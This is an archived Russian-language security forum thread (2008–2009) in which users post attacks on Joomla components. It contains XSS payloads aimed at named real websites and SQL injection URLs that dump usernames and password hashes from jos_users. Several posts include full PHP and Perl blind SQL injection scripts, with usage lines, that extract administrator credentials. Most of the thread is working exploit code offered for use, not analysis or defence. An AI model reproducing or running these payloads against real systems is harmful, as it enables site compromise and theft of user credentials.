ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
XSS в модуле com_frontpage в параметре fontstyle. |

19.12.2008, 18:24
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме: 536527
Репутация:
62
|
|
XSS в модуле com_frontpage в параметре fontstyle.
Код:
Код:
/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Примеры:
Код:
http://www.l2hell.ru/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Код:
http://uasos.com/index.php?Itemid=1&limit=14&limitstart=10696&option=com_frontpage&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
|
|
|
Joomla Component com_hbssearch(r_type) Blind SQL-injection |

22.12.2008, 16:52
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме: 3659973
Репутация:
466
|
|
Joomla Component com_hbssearch(r_type) Blind SQL-injection
Joomla Component com_hbssearch(r_type) Blind SQL-injection
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetai ls&id=1&r_type=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->FALSE
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->TRUE
# milw0rm.com [2008-12-21]
Joomla Component com_tophotelmodule(id) Blind SQL-injection
Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=4 -->FALSE
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=5 -->TRUE
# milw0rm.com [2008-12-21]
Последний раз редактировалось Rubaka; 22.12.2008 в 16:55..
|
|
|

24.12.2008, 02:32
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7568
:::::::
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7567
|
|
|

25.12.2008, 00:36
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7572
::::
Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7573
:::::
Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln
__________
http://www.milw0rm.com/exploits/7574
:::::
Joomla Component 5starhotels (id) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7575
Последний раз редактировалось swt1; 25.12.2008 в 00:41..
|
|
|

05.01.2009, 23:54
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
Joomla com_phocadocumentation (id) Remote SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7670
:::::
Joomla com_na_newsdescription (newsid) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7669
:::::
__________
Joomla Component simple_review 1.x SQL Injection Vulnerability
:::::
http://www.milw0rm.com/exploits/7667
Последний раз редактировалось swt1; 05.01.2009 в 23:57..
|
|
|

10.01.2009, 18:17
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме: 5111568
Репутация:
2399
|
|
Компонент ReMOSitory 341RE (com_remository)
XSS
/index.php?option=com_remository&Itemid=1&func=sele ct_XSS&
Пример:
http://studik.lviv.ua/index.php?option=com_remository&Itemid=44&func=sel ect_<img src="" onerror=alert('xss') xxx&id=1&orderby=2&page=2
|
|
|

14.01.2009, 10:08
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Двиг: Joomla
Компонент: com_gigcal(gigcal_gigs_id)
Уязвимость: SQL-injection
Код:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
|
|
|

14.01.2009, 11:50
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Joomla
Компонент: Fantasytournament (com_fantasytournament)
Version: 2009.1.5
Уязвимость: SQL-injection
Код:
http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
Код:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
Код:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
Author:"Adrian Gray"
Компонент: Camelcitydb2 (com_camelcitydb2)
Version: 2.2
Уязвимость: SQL-injection
Код:
http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
Author:"Noel Hunter"
Последний раз редактировалось z00MAN; 14.01.2009 в 11:55..
|
|
|

15.01.2009, 21:04
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Joomla
Компонент: com_Eventing 1.6.x
Уязвимость: SQL Injection Exploit
PHP код:
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# Joomla com_Eventing Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# cyb3r-1st@hormail.com
# == Writing by Stack - thx m8 - ==
#
# usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
# milw0rm.com [2009-01-15]
Компонент: RD-Autos 1.5.2
Уязвимость: SQL Injection Vulnerability
[~] Exploit
Код:
/index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example
Код:
/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54
Последний раз редактировалось z00MAN; 16.01.2009 в 16:22..
|
|
|

20.01.2009, 12:12
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Joomla
Компонент: Gigcal 1.x
Уязвимость: SQL Injection Vulnerability
Exploit :
Код:
http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
Компонент: com_pccookbook
Уязвимость: Blind SQL Injection Exploit
Код HTML:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #########################################################################\n";
print " # \n";
print " # Joomla com_pccookbook Blind sql injection exploit \n";
print " # \n";
print " # Cyb3R-1sT \n";
print " # cyb3r-1st[at]hotmail.com \n";
print " # \n";
print " # Usage:perl file.pl host path <options> \n";
print " # example: perl file.pl www.host.com /joomla/ -a 7 \n";
print " # \n";
print " # Options: -a id \n";
print " # \n";
print " #########################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] Password: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Ingredients";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
Компонент: com_news
Уязвимость: SQL Injection Vulnerability
Exploit:
Код:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
Компонент: com_waticketsystem
Уязвимость: Blind SQL Injection Exploit
PHP код:
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# Joomla com_waticketsystem Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# cyb3r-1st@hormail.com
# == inject0r5 t3am ==
#
# usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|